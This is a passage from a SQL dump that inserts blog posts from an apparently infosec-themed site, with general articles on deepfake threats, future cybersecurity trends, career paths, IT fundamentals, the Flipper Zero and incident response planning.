anticipate and address these risks. Here are five notable cases, along with measures that could mitigate similar attacks in the future:\n\n### 1. Deepfake Voice Scam on a UK CEO\n\nCybercriminals used AI-generated audio to mimic the voice of the CEO\'s boss, requesting a €220,000 transfer to a \"supplier.\" The attack was successful.\n\n**Preventative Measure**: Two-factor authentication and requiring written confirmation for financial transactions could have stopped this scam.\n\n### 2. Elon Musk-Deepfake Cryptocurrency Fraud\n\nDeepfakes of Elon Musk have been used in fabricated videos promoting fraudulent cryptocurrency schemes, tricking users into investing.\n\n**Preventative Measure**: Educating users about phishing red flags and introducing real-time deepfake detection tools can safeguard against such schemes.\n\n### 3. Deepfake Videos in Indian Elections\n\nDeepfake videos of political leaders were used to spread false campaign messages to promote divisive misinformation.\n\n**Preventative Measure**: Strengthening media literacy campaigns and fact-checking initiatives can help fight disinformation in politically charged contexts.\n\n### 4. Manipulated Security Footage\n\nDeepfake-altered surveillance footage was once demonstrated as a proof-of-concept to frame someone for crimes they didn’t commit, though thankfully not used in real trials.\n\n**Preventative Measure**: Blockchain systems verify authenticity by timestamping video metadata, making it tamper-proof.\n\n### 5. Social Media Exploitation\n\nCybercriminals have used doctored live streams to request donations or funds intended for fake causes.\n\n**Preventative Measure**: AI tools like ClearView or social media verification systems can be used to validate livestream sources.\n\n## Technical Analysis: How Deepfakes Bypass Security Measures\n\nDeepfakes rely on advanced neural networks that learn to mimic real-world data. Here’s why they can bypass traditional security defenses.\n\n### 1. Advanced AI Algorithms\n\nDeepfakes use _Generative Adversarial Networks (GANs)_ where one AI model generates fake content and another AI model evaluates its realism. This iterative process results in increasingly lifelike forgeries that fool both humans and AI detection models.\n\n### 2. Spoofing Techniques in Biometrics\n\nDeepfakes can deceive biometric authentication systems, such as facial recognition and voice verification, by providing high-definition, AI-generated replicas.\n\n### 3. Weak Detection Software\n\nMuch of the world’s current security software is optimized for older forms of attacks (e.g., ransomware). They lack the sophistication needed to detect dynamic or subtle anomalies in video/audio files generated by deepfake technology.\n\n## Prevention and Detection: Tools and Strategies\n\nStaying ahead of deepfake threats requires proactive strategies and cutting-edge tools. Here’s what cybersecurity professionals recommend:\n\n### 1. Use Deepfake Detection Tools\n\nAI-powered detection tools like Sensity.ai, Deepware Scanner, and Microsoft’s Video Authenticator analyze videos and audio for signs of manipulation.\n\n### 2. Enhanced Biometric Authentication\n\nImplement multi-modal biometric verification, combining face, voice, behavior, and iris detection for secure confirmation.\n\n### 3. Blockchain for Media Authentication\n\nUse blockchain to track the provenance of digital media files, including timestamps and metadata verification. Companies like Truepic are paving the way for secure media authentication.\n\n### 4. Training and Awareness\n\nEducate employees and individuals on recognizing potential deepfake scams and phishing attempts. Awareness remains one of the most important defenses.\n\n### 5. Regulatory Frameworks and Collaboration\n\nAdvocate for tighter regulations surrounding the use and creation of AI-generated content. Governments, tech firms, and cybersecurity agencies must work collectively to combat deepfake misuse.\n\n## The Future of Deepfakes and Cybersecurity\n\nDeepfake technology will only continue to evolve, offering even more realistic forgeries in the years to come. But with new defensive innovations also emerging, professionals in cybersecurity, policy-making, and tech industries still have an opportunity to minimize harm.\n\nFor instance, advancements in real-time detection algorithms and ethical AI standards may reduce their potential applications in cybercrime. Massive investments in media verification technologies are also gearing up to seal vulnerabilities.\n\n## Staying Ahead of the Curve\n\nThe risks posed by deepfakes to cybersecurity are real and growing. However, by staying informed, investing in preventative measures, and relying on innovative detection tools, individuals and organizations can counteract these threats effectively.\n\nAt the heart of cybersecurity is a principle that has always been true: education and preparation go hand-in-hand.', '', 'http://infoseclabs.io/uploads/1767564733348-245296497.jpeg', 'Illustration of deepfake technology impacting cybersecurity with video manipulation', 1, 'published', '2026-01-04 09:12:00', '2026-01-05 01:12:33', 'Information Security', 'Deepfakes: A New Cybersecurity Threat', 'Explore how deepfakes pose cybersecurity risks and learn strategies to combat these AI threats.', 'Deepfakes'),
(16, 'Exploring the Future of Cybersecurity: Emerging Threats and Tech Innovations', 'exploring-the-future-of-cybersecurity-emerging-threats-and-tech-innovations', '# The Future of Cybersecurity: Emerging Threats and Technological Advancements\n\nThe cybersecurity landscape is evolving faster than ever before, fueled by rapid technological advancements and an expanding digital footprint. From data breaches targeting small businesses to sophisticated state-sponsored attacks, the need for robust cybersecurity has never been greater. But what does the future hold for cybersecurity? This blog dives deep into emerging threats, groundbreaking technologies, and the skills required to combat cybercrime in the years ahead.\n\n## The Current State of Cybersecurity\n\nCybersecurity has become a top priority for businesses, governments, and individuals worldwide. A report by IBM Security reveals that the average cost of a data breach in 2023 reached $4.45 million, underscoring the financial and reputational damage caused by cyberattacks.\n\nThe challenges, however, are multifaceted. Ransomware attacks have surged, phishing campaigns are more sophisticated than ever, and vulnerable Internet of Things (IoT) devices have expanded the attack surface. While organizations are investing heavily in cybersecurity tools, the landscape continues to shift, demanding constant vigilance and innovation to stay ahead.\n\n## Emerging Cybersecurity Threats\n\nThe future of cybersecurity is shaped largely by the threats we face today and those emerging on the horizon. Below are the key threats to watch as we look to the future:\n\n### 1. AI-Powered Cyberattacks\n\nArtificial intelligence has revolutionized several industries, and unfortunately, cybercriminals are no exception. AI can be weaponized to launch more sophisticated and targeted attacks, such as:\n\n- **Deepfake Scams**: AI-generated videos and audio can convincingly impersonate individuals, leading to fraud, corporate espionage, or disinformation campaigns.\n- **Automated Phishing**: AI can create highly personalized phishing emails at scale, making them more convincing and effective.\n- **Adversarial Machine Learning**: Cyberattackers manipulate AI models used in cybersecurity systems, rendering them ineffective.\n\n### 2. IoT Vulnerabilities\n\nThe Internet of Things is set to grow to over **75 billion connected devices by 2025**, according to Statista. While IoT devices bring convenience and efficiency, their lack of robust security measures makes them prime targets for hackers. Attackers can exploit vulnerabilities in smart home devices, medical equipment, and industrial machinery, causing widespread disruptions and even endangering lives.\n\n### 3. Quantum Computing Risks\n\nQuantum computers have the potential to break traditional encryption protocols, threatening the security of sensitive data across industries. Although quantum computing is still in its early stages, experts warn that malicious actors and even nation-states are exploring its potential to outpace current encryption technologies.\n\n### 4. Supply Chain Attacks\n\nCybercriminals are increasingly targeting supply chains as a weak link in organizational defenses. By inserting malicious code into software updates or third-party vendor systems, attackers can gain access to larger networks, impacting multiple organizations simultaneously.\n\n### 5. The Rise of Geopolitical Cyberwarfare\n\nNation-states are engaging in cyberwarfare to disrupt critical infrastructure, steal intellectual property, and manipulate public opinion. These politically motivated attacks could become more frequent and destructive, especially as geopolitical tensions escalate.\n\n## Technological Advancements Shaping the Future\n\nWhile cyber threats proliferate, advancements in technology hold tremendous promise for enhancing cybersecurity. Here are some of the cutting-edge technologies poised to redefine cybersecurity:\n\n### 1. AI in Threat Detection\n\nAI is not just a tool for cybercriminals; it’s also a powerful defense mechanism. Advanced AI algorithms can analyze vast streams of data in real-time to detect anomalies, predict potential attacks, and respond to threats before they can cause damage.\n\nFor example, machine learning-based security systems can identify unusual patterns of behavior, like unauthorized access attempts, and automatically isolate affected systems to prevent breaches.\n\n### 2. Blockchain for Secure Transactions\n\nBlockchain technology, known for powering cryptocurrencies like Bitcoin, is being leveraged for secure data sharing and decentralized authentication. By recording transactions in a tamper-proof ledger, blockchain reduces the risk of data breaches and ensures transparency.\n\nBlockchain is particularly promising for financial institutions, healthcare providers, and supply chain networks that require traceable and secure transactions.\n\n### 3. Zero Trust Architecture\n\nThe \"trust no one\" principle is gaining traction in cybersecurity through Zero Trust Architecture. This approach ensures that every user, device, and application is continuously verified before being granted access, minimizing the risk of insider threats and unauthorized access.\n\n### 4. Biometric Authentication\n\nTraditional passwords are rapidly being replaced by biometric authentication methods such as fingerprint scanning and facial recognition. These systems offer a higher level of security as they are harder to replicate or steal.\n\n### 5. Post-Quantum Cryptography\n\nWith the threat of quantum computing on the horizon, researchers are developing post-quantum cryptography methods to secure sensitive information. These encryption protocols are designed to withstand attacks from quantum computers, ensuring data remains protected in the future.\n\n## Skills and Training for the Cybersecurity Workforce\n\nThe success of future cybersecurity efforts will depend heavily on skilled professionals equipped to address evolving challenges. Here’s how organizations can empower their workforce:\n\n### 1. Prioritize Continuous Learning\n\nThe cybersecurity field is dynamic, and professionals need to stay up-to-date with the latest tools, technologies, and threat landscapes. Certifications like Certified Information Systems Security Professional (CISSP) and Certified Ethical Hacker (CEH) are valuable for keeping skills sharp.\n\n### 2. Develop AI Expertise\n\nUnderstanding how AI operates, including its strengths and vulnerabilities, will be essential for combating AI-driven attacks. Training programs that focus on integrating AI into cybersecurity strategies are critical.\n\n### 3. Promote Ethical Hacking\n\nEthical hackers, or white-hat hackers, play a vital role in identifying vulnerabilities before malicious actors can exploit them. Organizations should invest in ethical hacking programs to bolster their defenses.\n\n### 4. Foster Diversity and Inclusion\n\nA diverse workforce brings fresh perspectives and innovative problem-solving approaches. Encouraging inclusivity in cybersecurity hiring practices enhances the industry\'s capabilities overall.\n\n## Predictions and Recommendations for the Future\n\nCybersecurity will only grow more complex in the coming years. Here are some key predictions and actionable recommendations for businesses and professionals looking to stay ahead:\n\n- **Prediction 1**: AI-based cybersecurity systems will become the industry standard within the next five years.\n  - **Recommendation**: Invest in AI-driven solutions now to future-proof your organization against emerging threats.\n\n- **Prediction 2**: Regulations and compliance requirements will tighten globally.\n  - **Recommendation**: Stay informed about legislation like GDPR and CCPA, and ensure your security frameworks meet compliance standards.\n\n- **Prediction 3**: Cybersecurity insurance will become a necessity.\n  - **Recommendation**: Secure a comprehensive cybersecurity insurance plan to mitigate potential risks and financial losses.', '', 'http://infoseclabs.io/uploads/1767564873422-280949463.jpg', 'Digital lock symbolizing cybersecurity with tech icons', 1, 'published', '2026-01-04 17:14:00', '2026-01-05 01:14:39', 'Information Security', 'Emerging Tech & Its Impact on Cybersecurity', 'Explore how emerging technologies like AI & IoT shape the future of cybersecurity and introduce new threats.', 'Emerging technologies'),
(17, 'Unlocking Cybersecurity: Alternative Career Paths Beyond Pentesting', 'unlocking-cybersecurity-alternative-career-paths-beyond-pentesting', '# Exploring Diverse Careers in Cybersecurity\n\nCybersecurity is often synonymous with penetration testing, or \"pentesting.\" It\'s an exciting career that involves identifying vulnerabilities in systems by attempting to \"hack\" into them before malicious actors do. However, while pentesting grabs the spotlight, the field of cybersecurity is far more diverse than many realize.\n\nIf you\'re an IT professional, a cybersecurity enthusiast, or exploring a career pivot, this guide will introduce you to some rewarding alternative careers in cybersecurity. Whether you\'re looking to escape the competitive pentesting job market or discover a role that better suits your skills, you\'re in for an eye-opening exploration of options.\n\n## Why Look Beyond Pentesting?\n\nPentesting is a well-known cybersecurity role, but its popularity has its downsides. The market for pentesters has become more saturated in recent years, making it harder to break into or advance in the field. Additionally, professionals in this space sometimes report less financial fulfillment than they anticipated.\n\nThe good news? Cybersecurity is an incredibly dynamic field with options that extend far beyond pentesting, offering paths that are equally impactful, lucrative, and in demand.\n\n## Top Alternative Careers in Cybersecurity\n\nHere are some lesser-known roles worth exploring in this exciting industry, complete with insights into their responsibilities, required skills, and career potential.\n\n### 1. Security Engineer\n\n**What They Do:**\n\nSecurity engineers focus on designing, building, and maintaining robust security systems and protocols to protect organizations from cyber threats. Instead of identifying vulnerabilities like pentesters, they proactively build defenses to avert attacks.\n\n**Key Skills:**\n\n- Familiarity with security tools and products.\n- Experience in systems integration and implementation.\n- Problem-solving and troubleshooting expertise.\n\n**Career Opportunities:**\n\nMany security engineers take on roles in pre-sales or post-sales for organizations, helping customers adopt security solutions effectively. With businesses scaling their digital footprints, these professionals are in high demand.\n\n### 2. Security Operations Center (SOC) Analyst\n\n**What They Do:**\n\nSOC analysts monitor an organization\'s network in real-time, watching for suspicious behavior and responding to security incidents. They operate on the front lines of cybersecurity defense, mitigating risks as they arise.\n\n**Progression Levels:**\n\nSOC analysts typically begin at Level 1 (entry-level), where they monitor activity and flag threats. With experience, they can move into Level 2 or Level 3 roles, which involve complex investigations and response strategies.\n\n### 3. Cybersecurity Solution Architect\n\n**What They Do:**\n\nCybersecurity solution architects design high-level frameworks that secure organizational infrastructure. They ensure that systems are scalable and resilient to evolving threats.\n\n**Key Skills:**\n\n- Deep understanding of both cybersecurity and IT infrastructure.\n- Ability to identify risks and proactively mitigate them using effective designs.\n- Proficiency in cybersecurity tools and enterprise systems.\n\nFor those with a knack for strategy and technology, this role offers tremendous growth opportunities.\n\n### 4. Governance, Risk, and Compliance (GRC) Specialist\n\n**What They Do:**\n\nA GRC specialist helps organizations meet regulatory standards, enforce policies, and minimize risks. They often play an advisory role by conducting audits, managing compliance frameworks, and ensuring the organization aligns with laws like GDPR or SOX.\n\n**Why It’s Rewarding:**\n\nCompliance isn’t just about ticking boxes; it’s about building trust, mitigating financial risks, and enabling long-term business success.\n\n### 5. Cybersecurity Auditor\n\n**What They Do:**\n\nCybersecurity auditors evaluate an organization’s security measures, identifying vulnerabilities and providing recommendations to improve. Their work ensures that systems are safe, efficient, and compliant with industry standards.\n\n**Required Skills:**\n\n- Expertise in audit compliance protocols.\n- Strong risk management capabilities.\n- Analytical mindset for identifying gaps in existing security measures.\n\n### 6. Cloud Security Specialist\n\n**What They Do:**\n\nAs more businesses migrate their operations to the cloud, cloud security specialists are tasked with safeguarding sensitive data and securing cloud-based platforms. They implement access controls, monitor for threats, and ensure systems are compliant with cloud regulations.\n\n**Why It Matters:**\n\nCloud expertise is in short supply, making this one of the most sought-after roles in cybersecurity today.\n\n## Making the Transition\n\nEager to branch out into one of these roles? Here’s how to make a seamless transition into your ideal cybersecurity career.\n\n### Build Foundational IT Skills\n\nIf you’re new to cybersecurity, start with roles like system administrator, software developer, or helpdesk technician. These will provide a solid foundation in IT and networking principles.\n\n### Specialize and Gain Certifications\n\nCertifications are often a critical stepping stone in cybersecurity. Some valuable ones include:\n\n- **CISSP (Certified Information Systems Security Professional):** Perfect for advanced roles like cybersecurity architect or GRC specialist.\n- **CISM (Certified Information Security Manager):** Ideal for governance and compliance roles.\n- **CEH (Certified Ethical Hacker):** Helpful if you want to enhance your penetration testing skills or transition into a SOC analyst role.\n\n### Gain Practical Experience\n\nHands-on experience is vital. Look for internships, contribute to open-source projects, or invest in lab environments like TryHackMe and Hack The Box.\n\n### Stay Current Through Continuous Learning\n\nCybersecurity evolves rapidly. Attend webinars, follow cybersecurity blogs, and participate in niche forums or events like Black Hat or DEF CON. Staying ahead requires staying informed.\n\n## A Rewarding Cybersecurity Career Awaits\n\nCybersecurity is an expansive field with opportunities far beyond pentesting. Whether you become a security engineer, cloud security specialist, or GRC expert, each role offers its own challenges and rewards.\n\nThe key is to explore your interests, focus on building the right skills, and stay adaptable in this ever-changing industry. By doing so, you’ll not only advance your career but also play a critical role in safeguarding the digital world.', '', 'http://infoseclabs.io/uploads/1767564951123-96955238.png', 'Various cybersecurity professionals collaborating in an office setting', 1, 'published', '2026-01-04 09:15:00', '2026-01-05 01:19:09', 'Information Security', 'Explore Cybersecurity Careers Beyond Pentesting', 'Discover diverse, rewarding cybersecurity careers beyond pentesting. Explore roles like Security Engineer, SOC Analyst, and more.', 'Cybersecurity Careers');
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(18, 'Kickstart Your Cybersecurity Career: Essential IT Fundamentals You Need to Know', 'kickstart-your-cybersecurity-career-essential-it-fundamentals-you-need-to-know', '# Kickstart Your Cybersecurity Career: Mastering IT Fundamentals\n\nAre you intrigued by the dynamic world of cybersecurity but unsure how to take the first step? A successful career in cybersecurity begins with mastering the fundamentals of IT. Understanding the essential concepts of hardware, software, networking, applications, and basic security practices not only lays a strong foundation but also equips you to tackle real-world challenges with confidence.\n\nThis guide will walk you through why IT knowledge is indispensable for cybersecurity, the core areas you need to focus on, how to acquire these skills, and the exciting career paths you can pursue in this field.\n\n## Why IT Fundamentals Matter for Cybersecurity\n\nBefore you can secure technology, you need to understand how it works. IT fundamentals give you the essential skills to configure and troubleshoot hardware, grasp how networking facilitates communication, identify vulnerabilities in systems and applications, and comprehend core cybersecurity principles.\n\nThink of IT knowledge as the stepping stone to your cybersecurity career. For instance, without a solid understanding of how a Layer 2 switch operates, implementing port security on that switch would be nearly impossible. Similarly, familiarity with operating systems like Windows or Linux is crucial for effectively deploying advanced tools and processes in the future.\n\nUnderstanding IT gives you the power to analyze and resolve technical issues, secure systems proactively, and build innovative solutions to protect sensitive information.\n\n## The Five Core Categories of IT Fundamentals\n\nTo build a strong IT foundation, focus on mastering these five categories. Each one plays a critical role in shaping your cybersecurity expertise.\n\n### 1. Hardware\n\nLearn the physical components of computers, such as processors, memory, and storage. Knowing how hardware works enables you to identify and resolve potential issues like faulty wiring or overheating. Mastering hardware configuration also sets the stage for securing physical devices against unauthorized access.\n\n### 2. Software\n\nExplore the world of operating systems and applications. Understand the basics of programs like word processors, browser clients, and operating systems such as Windows, macOS, and Linux. Gaining this knowledge allows you to analyze how software functions, which is vital for identifying vulnerabilities or misconfigurations.\n\n### 3. Networking\n\nNetworking is the backbone of modern communication, making it a critical area to understand. Learn how devices connect, share resources, and transfer data across networks. Concepts like IP addresses, protocols, and network topologies are key to identifying potential points of failure or attack.\n\n### 4. Applications\n\nApplications are the tools we use daily to accomplish specific tasks. From email clients to customer relationship management (CRM) software, understanding how applications interact with operating systems and hardware is crucial to ensuring their security and performance.\n\n### 5. Security Basics\n\nNo system is entirely free of risk. Security fundamentals teach you to recognize vulnerabilities, assess risks, and implement proactive defenses. Gain insight into best practices for password management, encryption, and patch updates to minimize threats.\n\nThese building blocks ensure that you have a comprehensive understanding of technology before advancing into more complex cybersecurity concepts.\n\n## Essential Skills to Acquire\n\nAspiring cybersecurity professionals should focus on acquiring specific IT skills that directly apply to real-world challenges. Here are a few necessary skills to get you started:\n\n- **Hardware Configuration**: Assemble and troubleshoot computer systems to fully understand their physical components.\n- **Operating System Management**: Learn how to install, configure, and maintain OS environments like Windows and Linux.\n- **Network Troubleshooting**: Gain practical knowledge in diagnosing and resolving connectivity issues.\n- **Threat Identification**: Learn how to spot and mitigate security threats, such as malware or phishing attempts.\n- **Ethical Hacking**: Understand the basics of offensive security measures, such as penetration testing, in a controlled and ethical environment.\n\nThese skills not only make you well-rounded but also prepare you to specialize in areas like digital forensics or penetration testing.\n\n## How to Learn IT Fundamentals\n\nFortunately, there’s a wealth of resources to help you learn IT fundamentals and cybersecurity basics. Whether you prefer structured courses or hands-on practice, there’s something for everyone.\n\n### Online Platforms\n\n- **FreeCodeCamp** offers free, beginner-friendly lessons on IT basics.\n- **Udemy** has courses like [Complete Introduction to Cybersecurity](https://udemy.com/course/complete-introduction-to-cybersecurity) by Grant Collins, which covers IT and cybersecurity fundamentals for beginners.\n- **YouTube** provides in-depth tutorials from trusted sources like Google and online tech communities.\n\n### Certification Programs\n\nCertifications validate your knowledge and show employers that you’re serious about your career. Consider starting with foundational credentials like CompTIA IT Fundamentals (ITF+) or Cisco’s CCNA certification.\n\n### Community Engagement\n\nJoin online communities, attend webinars, and participate in live Q&A sessions. Groups like Cybercademy provide career advice, security projects, and support networks for professionals and students.\n\n### Hands-On Practice\n\nSet up virtual environments, like Kali Linux virtual machines, to experiment safely. Test tools and configurations to gain real-world experience.\n\nPractical projects not only enhance your technical skills but also build confidence as you apply theoretical knowledge to solve problems.\n\n## Cybersecurity Career Paths\n\nOnce you’ve mastered the basics, you’ll be ready to explore specialized roles within cybersecurity. Here are some popular career paths to consider:\n\n### Security Analyst\n\n- **Responsibilities**: Monitor and analyze security threats, respond to incidents, and implement security measures.\n- **Skills Needed**: Incident response, threat analysis, and knowledge of SIEM tools.\n\n### Network Engineer\n\n- **Responsibilities**: Design, implement, and maintain secure network architectures.\n- **Skills Needed**: Networking protocols, firewall configuration, and VPN setup.\n\n### Cybersecurity Consultant\n\n- **Responsibilities**: Assess organizational security risks, provide recommendations, and develop strategies to safeguard systems.\n- **Skills Needed**: Risk assessment, policy development, and regulatory compliance knowledge.\n\nEach role offers unique challenges and opportunities, allowing you to make a meaningful impact by defending businesses against cyber threats.\n\n## Start Building Your Cybersecurity Knowledge\n\nCybersecurity is an exciting and rewarding field, but a clear foundational knowledge is essential for success. Understanding IT fundamentals equips you with the skills and confidence needed to tackle advanced cybersecurity concepts down the line.\n\nBegin your educational journey today with resources that fit your learning style. Whether through online courses, practice projects, or community interactions, consistent learning and hands-on experience will pave the way for a successful cybersecurity career.', '', 'http://infoseclabs.io/uploads/1767565249662-511498932.jpeg', 'Person studying IT fundamentals for cybersecurity career', 1, 'published', '2026-01-04 09:19:00', '2026-01-05 01:20:50', 'Information Security', 'Start Your Cybersecurity Career: IT Essentials', 'Discover essential IT fundamentals to launch a successful cybersecurity career. Learn hardware, software, networking, and more.', 'IT fundamentals'),
(19, 'Flipper Zero: The Ultimate Starter Tool for Aspiring Cybersecurity Experts?', 'flipper-zero-the-ultimate-starter-tool-for-aspiring-cybersecurity-experts', '# Exploring Cybersecurity: Is Flipper Zero the Right Starting Point?\n\nIf you\'re venturing into the vast world of cybersecurity, you\'ve probably encountered the term \"Flipper Zero.\" This versatile device has gained popularity among ethical hackers, tech hobbyists, and security enthusiasts. With a sleek design and an adorable dolphin mascot, Flipper Zero is a portable hacking tool capable of exploring, analyzing, and interacting with various digital systems. But is it the best choice for beginners, or are there better alternatives for starting your cybersecurity journey?\n\nThis blog will guide you by exploring Flipper Zero\'s capabilities, assessing its pros and cons for beginners, and introducing alternative ways to build strong foundational skills in cybersecurity.\n\n## Is Flipper Zero a Good Starting Point for Cybersecurity?\n\nTo put it simply, Flipper Zero can be *a tool*, but it might not be *the tool* to begin your cybersecurity exploration. Let\'s break it down.\n\n### What Is Flipper Zero?\n\nFlipper Zero is a multifunctional device designed primarily for security testing and research. It leverages common communication protocols like RFID, NFC, infrared, and Bluetooth, making it useful for learning how these technologies function and exploring their vulnerabilities. With Flipper Zero, you can analyze signals, capture data packets, and even experiment with embedded hardware such as radio frequencies.\n\n### Pros of Starting with Flipper Zero\n\n- **Hands-on Insight into Various Technologies:** Flipper Zero offers real-world exposure to communication protocols such as RFID and NFC.\n- **Portable and Beginner-Friendly:** Its playful interface is unintimidating, making it a fun starting point for beginners with a tech affinity.\n- **Affordable Entry into Hardware Hacking:** Compared to high-end hardware hacking tools, Flipper Zero is relatively budget-friendly.\n- **Community Support:** The Flipper Zero community is active and ready to help new users experiment and troubleshoot.\n\n### Cons of Starting with Flipper Zero\n\n- **Limited Learning Scope for Beginners:** While it\'s great for hardware hacking, Flipper Zero doesn’t cover critical cybersecurity foundations like ethical hacking principles, network security basics, or malware analysis.\n- **Steep Learning Curve Without Context:** Without a foundational understanding of cybersecurity concepts, beginners may find the tool intimidating or struggle to use it meaningfully.\n- **Risk of Misuse:** Depending on where and how it\'s used, Flipper Zero may unintentionally steer newcomers toward ethically ambiguous practices.\n\n**Bottom Line:** While Flipper Zero is an excellent supplementary tool for intermediate users or those with technical know-how, it’s not an all-encompassing resource for beginners. You\'ll need additional learning pathways to properly establish a clear cybersecurity foundation.\n\n## What Are the Best Alternatives for Beginners?\n\nIf you’re just starting, opting for tools and platforms designed to teach foundational cybersecurity concepts might be a better path. Here are some beginner-friendly resources you can explore.\n\n### 1. Learning Platforms and Tutorials\n\n- **Hack The Box:** A platform with hands-on labs tailored for all skill levels. They offer challenges ranging from simple exercises to complex simulations.\n- **TryHackMe:** Beginner-friendly tutorials that incorporate guided instructions and hands-on challenges to get you started with ethical hacking and cybersecurity concepts.\n- **Cybrary:** A learning hub with free and paid courses on penetration testing, digital forensics, and more.\n- **Codecademy and FreeCodeCamp:** Great for learning programming languages like Python, which is crucial in cybersecurity.\n\n### 2. Open Source Tools\n\n- **Kali Linux:** One of the most popular operating systems for penetration testing and ethical hacking.\n- **Wireshark:** Essential for network analysis and learning how data moves across systems.\n- **Metasploit Framework:** A penetration testing tool perfect for learning about exploit techniques and system vulnerabilities.\n\n### 3. Beginner-Friendly Devices\n\nIf you’re interested in hardware hacking specifically, consider starting with simpler tools like Raspberry Pi or Arduino. These low-cost, flexible devices allow you to experiment with IoT (Internet of Things) security and basic electronics hacking before jumping to multi-functional tools like Flipper Zero.\n\n## Create a Structured Learning Path\n\nA thoughtful learning path will help you build a solid foundation and maintain consistent progress. Here\'s a simple roadmap to get started.\n\n### Step 1. Learn the Basics\n\nStart with free cybersecurity primers or videos on platforms like YouTube. Specifically, look into topics such as:\n\n- What is cybersecurity?\n- Understanding common threats (e.g., phishing, malware, ransomware).\n- Introduction to ethical hacking principles.\n\n### Step 2. Get Certified\n\nEarning certifications is a great way to build credentials and structure your learning. Here are beginner-friendly certifications to consider:\n\n- **CompTIA Security+:** A certification that covers network security fundamentals.\n- **Certified Ethical Hacker (CEH):** A foundational course to help you understand ethical hacking practices.\n- **Certified Information Systems Security Professional (CISSP):** For those aiming to take cybersecurity professionally.\n\n### Step 3. Choose a Specialization\n\nCybersecurity spans many fields, including network security, malware analysis, penetration testing, and cloud security. Once you\'ve learned the basics, explore various fields to find what interests you the most.\n\n### Step 4. Hands-On Practice\n\nApply your knowledge by solving challenges, participating in Capture The Flag (CTF) competitions, or completing simulations on HackerOne or Bugcrowd.\n\n## Why Hands-On Experience Matters\n\nTheory can only take you so far. Gaining practical experience will help you develop key problem-solving skills and confidence. Start small—for example, use Wireshark to monitor the security of your home network. Platforms like Hack The Box and TryHackMe are also excellent for setting up virtual labs where you can safely practice without real-world consequences.\n\n## Connect with the Cybersecurity Community\n\nOne of the most underrated tools for success? Networking. Engaging with experienced people in cybersecurity can expose you to valuable advice, job opportunities, and learning resources.\n\n### Communities to Join\n\n- **Cybersecurity Subreddits (e.g., r/AskNetsec):** Great for asking questions or discussing cybersecurity trends.\n- **LinkedIn Groups:** Connect with professionals and stay updated on industry news. \n\nEngage with these communities to enhance your learning and career prospects in cybersecurity.', '', 'http://infoseclabs.io/uploads/1767565511958-305863866.png', 'Flipper Zero device showcasing its interface and dolphin mascot', 1, 'published', '2026-01-04 17:24:00', '2026-01-05 01:25:21', 'Information Security', 'Flipper Zero: Best Beginner Tool for Cybersecurity?', 'Discover if Flipper Zero is ideal for cybersecurity beginners. Explore its pros, cons, and alternatives to start your journey.', 'Flipper Zero'),
(20, 'Why Every Organization Needs an Incident Response Plan for Cybersecurity', 'why-every-organization-needs-an-incident-response-plan-for-cybersecurity', '# What Is an Incident Response Plan (IRP) and Why Does Your Business Need One?\n\nIn today’s fast-paced digital landscape, cyber threats are becoming more advanced, and businesses can no longer afford to be reactive about cybersecurity. A single data breach or ransomware attack can bring operations to a halt, costing millions and damaging your reputation.\n\nThis is where an **Incident Response Plan (IRP)** comes in. Think of it as your organization’s cybersecurity playbook—a guide to managing and mitigating the damage caused by cyberattacks. A well-crafted IRP not only minimizes downtime but also ensures faster recovery, saving your business time, money, and stress.\n\nThis guide will explain why an IRP is essential, how it protects your business from cyber threats, and the steps to create, test, and improve it.\n\n---\n\n## Why Is an Incident Response Plan Important?\n\nWithout a solid plan in place, businesses are left scrambling to deal with cyberattacks, leading to chaos, delays, and greater financial losses. An **Incident Response Plan** is the backbone of effective cybersecurity, helping businesses stay resilient against threats. Here’s why every organization needs one:\n\n### 1. Minimize Downtime\n\nEvery second counts during a cyberattack. A strong IRP gives your team clear steps to follow, reducing system downtime and restoring operations quickly.\n\n### 2. Reduce Financial and Reputational Damage\n\nCyberattacks can result in regulatory fines, business losses, and a tarnished brand image. A swift and transparent response, guided by an IRP, can minimize these impacts.\n\n### 3. Ensure Regulatory Compliance\n\nMany industries require organizations to have an IRP as part of their cybersecurity measures. For example, companies under **GDPR**, **HIPAA**, or similar regulations must demonstrate they have plans in place to manage data breaches.\n\n### 4. Boost Customer Trust\n\nClients trust companies that can handle cyber threats effectively. A demonstrated ability to respond to incidents builds confidence and strengthens customer relationships.\n\n### 5. Reduce Stress for IT Teams\n\nCybersecurity teams face enormous pressure during an attack. An IRP eliminates the guesswork, helping them make better decisions and reducing stress.\n\n---\n\n## Components of an Effective Incident Response Plan\n\nA great IRP is more than a document—it’s a strategic guide with clear roles, processes, and actionable steps. Here are the key elements:\n\n### 1. Team Roles and Responsibilities\n\nDefine who does what during an incident. Your team may include an Incident Response Manager, IT Security Analysts, Communication Managers, and legal advisors.\n\n### 2. Incident Identification and Classification\n\nEstablish criteria for identifying incidents and their severity levels. Knowing whether a threat is minor or critical helps prioritize resources.\n\n### 3. Actionable Playbook for Threats\n\nOutline specific steps for containment, eradication, and recovery. Include backup options in case primary systems fail.\n\n### 4. Communication Protocols\n\nPlan how to share information during a crisis, both internally (IT team, executives, employees) and externally (customers, partners, regulators).\n\n### 5. Legal and Compliance Requirements\n\nDocument steps to meet legal obligations, such as notifying affected users or regulatory bodies of a data breach within the required timeline.\n\n### 6. Post-Incident Review\n\nInclude a process for reviewing incidents to identify weaknesses and improve future responses.\n\n---\n\n## How to Create an Incident Response Plan\n\nBuilding an effective IRP takes time and planning. Here are the essential steps:\n\n### Step 1. Assess Your Cybersecurity Risks\n\nIdentify your organization’s vulnerabilities. Are ransomware attacks, phishing scams, or insider threats more likely? Understanding your risks is the foundation of your plan.\n\n### Step 2. Identify Critical Assets\n\nList the most important assets to protect, such as customer data, intellectual property, or systems critical to daily operations.\n\n### Step 3. Assemble Your Incident Response Team (IRT)\n\nForm a team with defined roles, including IT staff, legal advisors, and PR experts to manage internal and external communications.\n\n### Step 4. Write a Threat Response Playbook\n\nCreate detailed steps for handling specific threats, such as ransomware, DDoS attacks, or phishing. Keep the instructions clear and easy to follow.\n\n### Step 5. Set Up Incident Documentation\n\nDevelop a system to log incidents, track how they were detected, and record steps taken to resolve them. This helps improve future responses.\n\n### Step 6. Train Employees\n\nTrain all employees—not just IT—on how to recognize and report potential threats. Cybersecurity is a team effort, and awareness is key.\n\n---\n\n## Testing and Improving Your Incident Response Plan\n\nAn IRP needs 